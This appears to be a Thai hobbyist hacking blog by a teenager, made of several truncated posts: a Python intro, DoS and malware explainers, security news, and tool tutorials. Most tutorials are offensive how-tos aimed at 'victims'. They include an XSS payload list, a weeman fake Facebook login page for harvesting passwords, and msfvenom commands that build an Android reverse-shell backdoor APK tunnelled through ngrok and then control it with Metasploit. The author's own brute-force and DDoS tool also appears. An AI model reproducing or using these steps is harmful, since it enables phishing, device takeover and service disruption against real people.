DedSec CyberTeam TH

มาเรียนการเขียนโปรแกรมด้วยภาษา python กันเถอะ     ก่อนที่เราจะมาเข้าเรื่อง ผมขอแนะนำตัวก่อนนะครับเพราะอาจจะมีบางคนติดตามผมมานานแต่ไม่รู้จักตัวสักที ผมชื่อนายฐิติกร พุมมา ชื่อเล่น เบล หรืออีกชื่อหนึ่งว่า zero ผมเป็นนักเรียนชั้นมัธยมศึกษาปีที่ 3 ผมมีความสามารถเขียนโปรแกรม และเจาะระบบเล็กน้อย     ในตอนนี้ผมก็จะมาสอนการเขียนโปรแกรมด้วย ภาษา python แต่ก่อนอื่นเราต้องมา ทำความรู้จักกันก่อนว่า ภาษา python คืออะไร ภาษา python คืออะไร    ภาษา python เป็นภาษาในการเขียนโปรแกรมรูปแบบหนึ่ง เป็นภาษาที่เขียนง่าย และง่ายต่อการพัฒนาโปรแกรม ซึ่งส่วนใหญ่จะใช้ในการเขียนโปรแกรมบอทมากกว่า และภาษา python ก็ได้ชื่อว่าเป็นภาษาของแฮกเกอร์ เพราะโปรแกรมเจาะระบบส่วนใหญ่ เขียนด้วยภาษา python วิธีติดตั้งภาษา python    ก่อนที่เราจะมาลงมือเขียนโปรแกรมคอมพิวเตอร์ เราต้องติดตั้งตัวโปรแกรม python เพื่อให้โปรแกรมที่เราเขียนทำงานได้บนระบบปฎิบัติการของคุณ ไม่ว่าจะเป็น ระบบปฏิบัติการ Windows ระบบปฏิบัติการ Linux หรือ ระบบปฏิบัติการ Android ระบบปฏิบัติการ Windows ให้ทำการดาวน์โหลดตัวโปรแกรม python โด

  หากจะพูดถึง Dos ทุกคนอาจนึกถึงการยิงเน็ตบ้าน หรือการยิงเว็บไซต์ให้มันล่มหรือใช้งานไม่ได้ แต่ที่จริงแล้ว มันไม่ได้มีแต่การยิงเน็ตเท่านั้น ที่จะทำให้เว็บล้ม หรือเน็ตบ้านใช้งานไม่ได้    ก่อนที่เราจะมาพูดถึงวิธีโจมตี เรามาทำความรู้จักก่อนว่า DDos คืออะไร Dos คืออะไร   DDod หรือ Denial of Service  ใน วิชาการคอมพิวเตอร์   การโจมตีโดยปฏิเสธการให้บริการ   เป็นความพยายามทำให้เครื่องหรือทรัพยากรเครือข่ายสำหรับผู้ใช้เป้าหมายใช้บริการไม่ได้ เช่น ขัดขวางหรือชะลอบริการของแม่ข่ายที่เชื่อมโยงกับ อินเทอร์เน็ต อย่างชั่วคราวหรือถาวร ส่วน   การโจมตีโดยปฏิเสธการให้บริการแบบกระจาย  ( distributed denial-of-service (DDoS) attack ) คือการโจมตีดังกล่าวซึ่งแหล่งต้นทางเป็นเลขที่อยู่ไอพีมากกว่าหนึ่งหมายเลข และมักจะเป็นพันหมายเลขฃ   อาชญากรผู้โจมตีมักมุ่งเป้าไปยังเว็บไซต์หรือบริการซึ่งตั้งอยู่ในเว็บเซิร์ฟเวอร์ที่มีการเข้าชมสูงอย่างเช่น ธนาคาร เกตเวย์ชำระบัตรเครดิต โดยมีแรงจูงใจเบื้องหลังเป็นการแก้แค้น การแบล็กเมล หรือการเคลื่อนไหวทางการเมือง เป็นต้น, และสิ่งนี้คือจุดเริ่มต้นของ Hacker ที่พยายามทำให้เซิ

XSS Payload for Hacking ครั้งที่ 1 XSS in HTML/Applications XSS Basic Basic payload < script > alert ( ' XSS ' ) < / script > < scr < script > ipt > alert ( ' XSS ' ) < / scr < script > ipt > " ><script>alert('XSS')</script> " >< script > alert ( String . fromCharCode ( 88 , 83 , 83 )) < / script > Img payload < img src = x onerror = alert ( ' XSS ' ); > < img src = x onerror = alert ( ' XSS ' ) // < img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x oneonerrorrror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > < img src = x : alert (alt) onerror = eval (src) alt = xss > " ><img src=x onerror=alert('XSS');> " >< img src = x onerror = alert ( String . fromCharCode ( 88 , 83 , 83 )); > Svg payload < svg onload = alert ( 1 ) > < svg / onload

    กองกำลังตำรวจจากนานาชาติ พร้อมด้วยตำรวจสากล ได้บุกเข้าจับกุมเจ้าของเว็บไซต์ Webstresser.org ซึ่งเป็นเว็บคนกลาง (marketplace) ในการค้นหาและใช้บริการยิง DDoS ที่ใหญ่ที่สุดของโลก ด้วยจำนวนผู้ใช้งานที่ลงทะเบียน 136,000 คน และมีส่วนในการโจมตีกว่า 4 ล้านครั้ง นับเฉพาะเดือนเมษายนนี้ ตำรวจสากลสามารถระบุตัวแอดมินของเว็บได้ว่าอาศัยอยู่ในแคนาดา, โครเอเชีย, เซอร์เบียและสหราชอาณาจักร ขณะที่เซิร์ฟเวอร์ตั้งอยู่ในเนเธอร์แลนด์, สหรัฐและเยอรมนี ก่อนจะมีมาตรการจัดการกับผู้ใช้ระดับสูงต่อไป ที่ทางตำรวจสากลระบุตัวได้แล้วว่าอาศัยอยู่ในออสเตรเลีย, แคนาดา, โครเอเชีย, ฮ่องกง, อิตาลี, เนเธอแลนด์, สเปนและสหราชอาณาจักร Webstresser มีลักษณะคล้ายกับเว็บอีคอมเมิร์ซ คือเป็นตัวกลางให้ผู้ขายบริการ DDoS กับลูกค้ามาเจอกัน โดยค่าใช้จ่ายในการใช้บริการอาจต่ำถึง 15 ยูโร (ราว 600 บาท) ต่อเดือน ซึ่งเว็บลักษณะนี้มีส่วนทำให้การโจมตี DDoS ถี่มากขึ้น โดยข้อมูลจาก Corero บริษัทวิจัยด้านความปลอดภัยระบุว่า ลูกค้าของบริษัทเจอกับการโจมตีเฉลี่ยที่ 6 ครั้งต่อวัน ที่มา : https://www.blognone.com/node/101844

  ในโพสนี้ผมจะมาสอนวิธีการหาช่องโหว่และบัคของแอพแอนดรอย ด้วย Tool ที่มีชื่อว่า Androbug Framework เพื่อทำการแก้ไข จุดบกพร่อง และป้องกันการโดนแฮกผ่านช่องโหว่ของแอพ วิธีการติดตั้ง $apt-get update && apt-get upgrade $apt-get install git -y $apt-get install python2 -y $git clone https://github.com/AndroBugs/AndroBugs_Framework.git $cd AndroBugs_Framework $chomd +x * วิธีใช้งาน $python2 androbug.py -f ชื่อไฟล์ apk ที่จะแฮก -o โฟลเดอร์ ที่จะเก็บข้อมูล

เว็บไซต์นิตยสาร Forbes รายงานว่าระบบสื่อสารโทรคมนาคมที่เรียกว่า Signalling System No. 7 (SS7) อันเป็นมาตรฐานการสื่อสารที่พัฒนาขึ้นมาตั้งแต่ปี 1975 มีช่องโหว่ร้ายแรงที่สำคัญ ซึ่งทำให้แฮกเกอร์สามารถหลอกผู้ให้บริการโทรคมนาคม (ในที่นี้คือโทรศัพท์เคลื่อนที่) ว่าโทรศัพท์มือถือของตนเองนั้นมีหมายเลขเดียวกับเครื่องเหยื่อเป้าหมายที่จะถูกโจมตี ทำให้แฮกเกอร์สามารถทำได้ทั้งรับสาย รับข้อความ SMS แทนเจ้าของเครื่องตัวจริง (ว่าง่ายๆ คือ hijack โทรศัพท์กันที่ระดับหมายเลข) พร้อมกับเผยแพร่วิดีโอสาธิตการโจมตีด้วย ช่องโหว่ดังกล่าวนี้ถือว่ามีความน่ากังวล เพราะไม่ได้ติดอยู่กับตัวระบบปฏิบัติการ และยังสามารถขยายไปดักฟังข้อมูลอื่นๆ ได้ด้วย ที่น่ากังวลคือมีหลายบริษัท (ล่าสุดเป็นบริษัทด้านความปลอดภัยจากอิสราเอล) เสนอบริการสอดแนมโดยใช้ช่องโหว่ในตัว SS7 และขายเครื่องมือเหล่านี้ให้กับหน่วยงานหรือคนที่สนใจใช้ด้วย (แต่ราคาก็ไม่ใช่ว่าจะหาซื้อกันง่ายๆ เพราะหลักล้านดอลลาร์สหรัฐขึ้นไปทั้งสิ้น) รวมถึงช่องโหว่เหล่านี้เป็นเรื่องที่วงการผู้เชี่ยวชาญทราบกันดีอยู่แล้ว (ทราบกันมาตั้งแต่ 2015) แต่ไม่มีใครทำอะไรได้เพราะปัญหาในระบบท

Virus Computer and Android Phone virus คือ โปรแกรม หรือ แอพพิเคชั่น ที่ประสงค์ร้าย จะทำลาย/ขโมยข้อมูล หรือทำให้ HardWare เสียหาย ชนิดของไว้รัส 1.Trojan คือไวรัสที่จะทำหน้าที่เป็นตัวเชื่อมทำให้แฮกเกอร์ สามารถควบคุมหรือขโมยข้อมูลของเครื่องเหยื่อได้ 2.Runsomware หรือไวรัสเรียกค่าไถ่ คือไวรัสที่ถูกสร้างขึ้นมาเพื่อเอาไว้ล็อกไฟล์ แฮกเกอร์ใช้มันล็อกไฟล์ในเครื่องเหยื่อ แล้วเรียกร้องให้จ่ายเงินมา เพื่อเป็นค่าไถ่ไฟล์ 3.WormInternet หรือ หนอนอินเตอร์เน็ต คือ ไวรัสที่จะอยู่ในอินเตอร์เน็ตคอยชอนใชเข้าเครื่องของเหยื่อ ด้วยการหาช่องโหวระบบ หรือด้วยการหารหัส(Brute Force) ไวรัสชนิดนี้ ทางกองทัพชอบใช้เพื่อทำลายโครงสร้างเพื่อฐาน และการคมนาคม ของประเทศศัตรู 4.Keyloggers คือไวรัสที่แฮกเกอร์ใช้เพื่อดัก Usernames และ Password ไวรัสชนิดนี้ จะฝังอยู่ในคีบอร์ด โดยไวรัสชนิดนี้จะบันทึกสิ่งที่เหยื่อพิมพ์แล้วส่งให้แฮกเกอร์หรือมิจฉาชีพ วิธีป้องกัน 1.ดาวโหลดและอัพเดตแอพ/โปรแกรมป้องกันไวรัส 2.อย่าดาวโหลด Add-on เบาเซอร์เยอะเกินความจำเป็น เพราะจะทำให้ช่องโหวระบบเยอะตาม 3.ถ้าเป็นไปได้  อย่ารูทเครื่อ

   อาจจะมีบางคนต้องการใช้งาน Kali Nethunter แต่ไม่สามารถรูทเครื่องได้ หรือ ติดตั้ง  TWRP Recovery ไม่ได้(ลงไม่เป็น) ผมก็จะมาแนะนำวิธีการลง Kali Nethunter แบบไม่ต้อง Root เครื่อง Kali Nethunter ทำอะไรได้บ้าง -สามารถปลดล็อกหน้าจอมือถือได้ -ใช้เป็น Bad USB, Keyboard Attack หรือ Rubber Ducky -แฮก, เตะออก, ดัก Wifi -Kali Linux VNC Server -ใช้แฮกได้เหมือ Kali วิธีติดตั้ง Kali Nethunter No Root $apt-get upgrade $apt-get install git $git clone https://github.com/Hax4us/Nethunter-In-Termux $cd Nethunter-In-Termux $chmod +x * $./Nethunter  หรือ $bash Nethunter มันก็จะติดตั้งอัตโนมัท วิธีใช้งาน $sh start.sh

weeman เป็นสคริปสำหรับทำเว็บ Facebook. ปลอม เมื่อเหยื่อกรอกอีเมลและรหัสผ่าน ข้อมูลเหล่านั้นจะแสดงใน Terminal สคริปนี้ใช้ได้ทั้งคอมและมือถือ วิธีติดตั้ง weeman $git clone https://github.com/evait-security/weeman วิธีใช้งาน $cd weeman $python2 weeman.py weeman > set url http://facebook.com weeman > set action_url http://www.facebook.com weeman > set port (ใส่ได้ตามใจเลย) weeman > run

ในบทความนี้ จะมาแสดงวิธีใช้งาน Metasploit Framework สำหรับแฮกคอมและมือถือ สิ่งแรกที่จะต้องทำคือสร้าง Playload หรือ BackDoor ไฟล์ เพื่อเอาไปติดตั้งลงในเครื่องของเหยื่อ วิธีสร้าง Playload $cd Metasploit-Framwork $ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT='ngrok port' R >  /sdcard/yourapkname.apk หมายเหตุ: คุณต้อง Forword Port ด้วย Ngrok ก่อนแล้วเอาเลขพอร์ตของ Ngrok มาใส่ หลังจากสร้าง Playload เรียบร้อยแล้ว ให้นำไปติดตั้งลงเครื่อง แล้วเข้าสู่หน้า console เพื่อทำการ Exploit เครื่องของเหยื่อ วิธี Exploit เครื่องเหยื่อ $ ./msfconsole $msf - use exploit/multi/handler $msf - set payload android/meterpreter/reverse_tcp $msf - set lhost 0.tcp.ngrok.io $msf - set lport ' your port which you have sent in ngrok  (eg. 4444)' $msf - exploit เมื่อคุณ Exploit เครื่องสำเร็จ คุณจะสามารถ ควบคุมเครื่องและดูข้อมูลของเหยื่อได้

HPAS1369 คือ Tools ที่ถูกสร้างเพื่อเอาไว้ทดสอบระบบ ถูกสร้างขึ้นโดย Zero Hacker (ผมเอง) ซึ้งสคริปนี้มีฟรีเจอร์อยู่ 4 อย่างคือ -Brute Force หารหัส -DDos Attack ยิงเว็บ ยิงเน็ต -NMap PortScanner แสกนพอร์ต NMap -Install Tools Hacking ติดตั้ง Tools อื่น คุณสามารถนำไปแฮกและทดสอบระบบได้ Tools นี้ไม่จำเป็นต้องรูท วิธีติดตั้ง $apt-get upgrade $apt-get install git python python2 $git clone https://github.com/DedSecCyber/HPAS1369 $cd HPAS1369 $sh install.sh มันก็จะติดตั้งโดยอัตโนมัท วิธีใช้ $python2 HPAS1369. py

   ผมมีนามปากกาว่า Zero Hacker ผมตอนนี้มีอายุ 15 ปี ผมเกิดที่จังหวัดกาณจนบุรี แล้วย้ายมาอยู่ที่นครสวรรค์ จุดเริ่มต้นของการเป็นแฮกเกอร์ของผมเกิดขึ้นจากเกมส์ๆหนึ่ง และพี่ AK    เรื่องมันเกิดขึ้นจากที่ผม เมื่อก่อนผมเคยเป็นนักแคสเกมส์ ตอนนั้นผมก็เห่อแคสเกมส์ตามเพื่อน ตอนนั้นผมมีคนติดตามอยู่ 27 กว่าคน ผมก็ไม่ได้คิดอะไรมาก ก็แคสเกมส์ต่อไป แต่ยอดซัพก็ยังไม่ขึ้น ผมรู้สึกเซ็ง เลยดูคนอื่นเขาแคสเกมส์ แล้วผมก็ดูนักแคสเกมส์คนหนึ่ง เขามีชื่อว่า เบนริเฟอร์ เป็นนักแคสเกมส์ชาวร็อค ที่ผมชอบดูเขาเล่นเกมส์ เขาได้เล่นเกมส์ๆหนึ่ง ชื่อเกมส์ว่า watchdog2 เนื้อเรื่องของเกมส์นั้นมันน่าสนใจ มันเกี่ยวกับกลุ่มแฮกเกอร์ที่ต่อสู้เพื่ออิสระภาพบนโลกอินเตอร์เน็ต โดยเขาใช้แค่มือถือแฮกได้เกือบทุกอย่าง ผมเห็นว่ามันดูเท่ เลยอยากเป็นแบบในเกมส์มั้ง เลยหาในยูทูป จนกระทั้งเจอแชลแนลหนึ่ง มีชื่อว่า Anachakmobile เขาได้สอนเรื่องวิธีลง Kali Linux และวิธีแฮกต่างๆ ผมเอาวิธีของเขามาลองทำในคอมโรงเรียน ดูไปทำไป จนผมเชี่ยวชาญ ต่อมาผมคิดว่า ในมือถือมันทำได้แบบคอมหรือเปล่า ผมก็เลยหาในยูทูปอีกครั้ง ปรากฎว่ามีคนสอนด้วย ชื่อแชลแนลว่า X-Tech

Kali Linux No install ผมจะมาแนะนำเว็บไซท์ที่เปิด Linux VNC Server สำหรับคนที่ต้องการใช้ Kali Linux แต่รูทไม่ได้ หรือ ติดตั้งไม่เป็น เว็บไซท์นี้ จะเปิด VNC Server ที่เป็นระบบปฏิบัติการ Linux และเราสามารถควบคุมได้ในเว็บเบาเซอร์ได้เลยโดยไม่ต้องติดตั้งตัว แอพ remote ลิ้งค์เว็บไซท์ https://linuxzoo.net Username : root Password  : kali

Kali Nethunter คืออะไร Kali Nethunter คือ Linux Rom ที่ถูกออกแบบมาให้ทำงานบน Android ได้(ไม่มีโหลดใน PlayStore) แต่รันได้แค่ Android 5.0-6.0 และต้องรูท ลิ้งค์ดาวโหลด Kali Nethunter https://www.offensive-security.com/kali-linux-nethunter-download/ วิธีติดตั้ง Kali Nethunter https://youtu.be/vKRJ85LvGiI 

Metasploit Framework คือ exploit สำหรับใช้แฮกคอมและมือถือ มี Playload หลากหลาย ซึ่งสามารถใช้ได้ทั้งคอม(Kali Linux, Parrot Security OS)และมือถือ(Termux,  GNURoot, Kali Nethunter) วิธีติดตั้ง Metasploit $apt-get upgrade $apt-get install git wget curl $wget https://gist.githubusercontent.com/Gameye98/d31055c2d71f2fa5b1fe8c7e691b998c/raw/09e43daceac3027a $sh msfinstall. sh มันก็จะติดตั้งเอง

ลิ้งค์ GitHub สำหรับลง Tools ไว้ แฮก GitHub เป็นเว็บไซท์ที่รวมซอฟแวร์และโปรแกรมต่างๆ ซึ่งสามารถเอาโปรแกรมหรือสคริปไปพัฒนาต่อได้ (แต่อาจติดลิขสิทธิ) และเราสามารถนำมาใช้ได้ ลิ้งค์สคริปสำหรับแฮก DosThunder https://github.com/DedSecCyber/DosThunder HPAS1369 https://github.com/DedSecCyber/HPAS1369 Lazymux https://github.com/Gameye98/Lazymux

Termux Terminal Termux คือแอพพิเคชั่น ที่เอาไว้เปิด Linux Terminal แอพนี้สามารถใช้งานได้โดยไม่ต้องรูท สามารถใช้งานได้บน Android 5.0 ขึ้นไป Termux สามารถดาวโหลดได้บน playstore Setup แอพ Termux Terminal หลังจากได้โหลดแอพ Termux มาเรียบร้อย มันจะมาแค่ตัวแอพ แต่ไม่มี Tools สำหรับแฮกเพราะฉนั้นจึงจำเป็นที่จะต้อง Setup และ Install แพ็คเก็ตที่จำเป็น คำสั่ง Setup และ Install แพ็คเก็ต $apt-get upgrade $termux-setup-storage $apt-get install git $apt-get install wget $pip install wordlist $apt-get install python python2 $apt-get install hydra $apt-get dist-upgrade คำสั่งลง Tools Scrip $git clone (ตามด้วยลิ้งค์ GitHub) $wget (ตามด้วยลิ้งค์ GitHub)